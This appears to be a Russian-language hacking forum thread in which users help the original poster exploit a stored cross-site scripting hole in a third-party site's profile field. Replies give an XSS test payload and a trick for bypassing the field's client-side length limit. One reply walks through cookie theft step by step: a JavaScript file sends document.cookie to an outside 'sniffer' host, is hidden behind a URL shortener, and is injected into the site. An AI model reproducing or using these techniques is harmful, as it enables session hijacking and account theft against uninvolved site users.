![]() |
Всем привет , у меня такой необычный вопрос , на одном сайте я нашел
Цитата:
Цитата:
Все проходит успешно и при заходе на данный профиль мне пишет что уязвимость есть , теперь я хочу вставить следующий скрипт Цитата:
Собственно вопрос : Как можно сделать короче (сократить, уменьшить ) Цитата:
Спасибо за внимание . |
Спрятать можно:
Код HTML:
HTML: |
возможно можно и без (type="text/javascript") не помню точно...
а в твой_скрипт.js пиши что надо, ну типа Цитата:
|
Не помогло. Мне нужно так чтобы за это http://s017.radikal.ru/i406/1111/e8/4b273c3c75ca.jpg поле , скрипт не вылазил.
|
URL в студио вида si[это не я]te.ru/script.php?vuln_param=">alert('xss')
|
Цитата:
|
Короче адрес уязвимого сайта давай =)
TC скинул адрес, но ничего не написал, где уязвимость |
Цитата:
1) открываем Opera (именно оперу и никакой другой !!!) и переходим на выбранный сайт 2) Жмём Правой кнопкой - Исходный код страницы 3) Ищем нашу строку с вводом строки и меняем её длину maxlength="13" на maxlength="1300" к примеру 4) Не выходя из редактирования исходного кода идёшь в левый верхний угол и ищешь там "Применить изменения", что собсно и жмёшь 5) Переходишь на вкладку с сайтом и вбиваешь всю стоку полностью, без предыдущего ограничения. Если фильтра в php-коде нет, тебя пропустит |
Цитата:
|
Если сервер рубит длину, то не поможет. Делается проще пареной репы же:
1) делаем файл 1.js 2) в него пишем img = new Image(); img.src = "http://sniffer.site.ru/blablabls.gif?"+document.cookie; 3) заливаем куда угодно на любой хостинг, например на фрихост какой-нибудь 4) идем на u.to, запихиваем туда ссылку на файл 1.js, получаем что-то типа http://u.to/abc123 5) вставляем на сайте вот такой код: Если нужно еще меньше, то пишем в асю 352223797 - скажу платное решение. |
| Время: 19:35 |